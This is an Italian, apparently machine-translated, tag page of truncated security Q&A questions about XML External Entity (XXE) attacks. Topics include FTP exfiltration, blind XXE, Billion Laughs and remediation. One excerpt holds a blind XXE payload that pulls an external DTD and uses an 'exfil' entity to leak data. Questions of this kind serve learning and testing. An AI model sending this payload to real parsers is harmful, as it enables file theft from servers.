Domande con tag 'xxe'

domande con tag
1
risposta

Esfilfazione tramite FTP utilizzando XXE su un server Tomcat

Sto cercando di estrarre dati binari da un server Tomcat che utilizza SAXParser. Per il mio server FTP, sto utilizzando questa fonte . Sto ospitando due DTD su Github Gist. Questi sono i loro contenuti: XML di base (cosa viene inviato al ser...
posta 08.11.2018 - 15:18
1
risposta

alternative al percorso di attacco per XXE

Quindi ho trovato un attacco Xml External Entity (XXE) cieco contro un'infrastruttura SAML durante un impegno con il client, ma mi ha dato problemi cercando di sfruttarlo prima. Posso costruire un semplice XXE: <?xml version="1.0" encoding=...
posta 07.06.2018 - 02:38
0
risposte

Esempio di elaborazione DTD non sicura in XmlSchema. Leggi

Secondo link e link il codice sottostante è vulnerabile all'attacco di espansione DTD: var src = "?payload?"; TextReader tr = new StreamReader(src); XmlSchema schema = XmlSchema.Read(tr, null); Qualcuno potrebbe fornir...
posta 18.02.2018 - 22:21
0
risposte

Java XXE Injection - Billion Laughs non funziona

Sto provando a riprodurre diversi attacchi xxe contro un servizio web java. Quando provo a riprodurre "Billion ride" ottengo sempre questo: Exception in thread "main" org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 1; The...
posta 13.10.2016 - 04:33
0
risposte

Risoluzione del difetto di entità esterna XML nel servizio di controllo dei messaggi?

Uno strumento di analisi del codice aziendale ha identificato una vulnerabilità di sicurezza in un servizio Web gestito dal mio team. Ha identificato una vulnerabilità XXE (XML External Entity) in questo servizio e ha fatto riferimento al foglio...
posta 30.11.2018 - 15:39
1
risposta

Perché abbiamo bisogno di dtd esterno in cieco XXE?

Un payload cieco XXE corretto è: - <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> File stored on http://127.0.0.1...
posta 02.11.2018 - 08:14
0
risposte

XXE iniezione nel nodo radice del documento XML

Quindi sono impegnato e ho scoperto un punto di iniezione XXE in un posto particolare su un'applicazione ASP.NET che non riesco a capire. Uno dei parametri del post controlla a quale "forma" viene inviato il resto dei dati e sembra che questo pa...
posta 29.06.2018 - 16:27
1
risposta

È possibile eseguire un attacco XXE all'interno di un file docx? [chiuso]

È possibile XXE in un caricamento di file con file .docx?     
posta 08.03.2018 - 11:05